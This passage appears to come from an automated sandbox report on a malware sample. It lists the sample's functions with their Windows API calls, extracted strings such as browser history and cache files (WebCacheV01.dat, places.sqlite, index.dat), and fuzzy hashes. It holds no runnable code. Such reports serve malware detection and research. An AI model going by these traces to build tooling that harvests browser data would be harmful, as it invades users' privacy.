                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Strings
                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                • API String ID: 3354267031-2114579845
                                                                                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                • String ID: }A
                                                                                                                                                • API String ID: 1821831730-2138825249
                                                                                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                                                • String ID: r!A
                                                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$memcmp
                                                                                                                                                • String ID: $$8
                                                                                                                                                • API String ID: 2808797137-435121686
                                                                                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                • too many columns on %s, xrefs: 00430763
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                • API String ID: 0-1445880494
                                                                                                                                                • Opcode ID: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                • Opcode Fuzzy Hash: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                  • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1042154641-0
                                                                                                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2947809556-0
                                                                                                                                                • Opcode ID: e9fa8cdb0503d843af4e6d4979f9032e8967895c6ef67b6505ea85934ab3b907
                                                                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                • Opcode Fuzzy Hash: e9fa8cdb0503d843af4e6d4979f9032e8967895c6ef67b6505ea85934ab3b907
                                                                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                • memset.MSVCRT ref: 00403A55
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                                                • String ID: history.dat$places.sqlite
                                                                                                                                                • API String ID: 3093078384-467022611
                                                                                                                                                • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 839530781-0
                                                                                                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                • String ID: *.*$index.dat
                                                                                                                                                • API String ID: 1974802433-2863569691
                                                                                                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@mallocmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3831604043-0
                                                                                                                                                • Opcode ID: a85243c3274abcf257bc8a1d0c36c9fb31ec9b9764bc30e3ac6d524e65cdc455
                                                                                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                • Opcode Fuzzy Hash: a85243c3274abcf257bc8a1d0c36c9fb31ec9b9764bc30e3ac6d524e65cdc455
                                                                                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1156039329-0
                                                                                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1631957507-0
                                                                                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1125800050-0
                                                                                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: d
                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: BINARY
                                                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
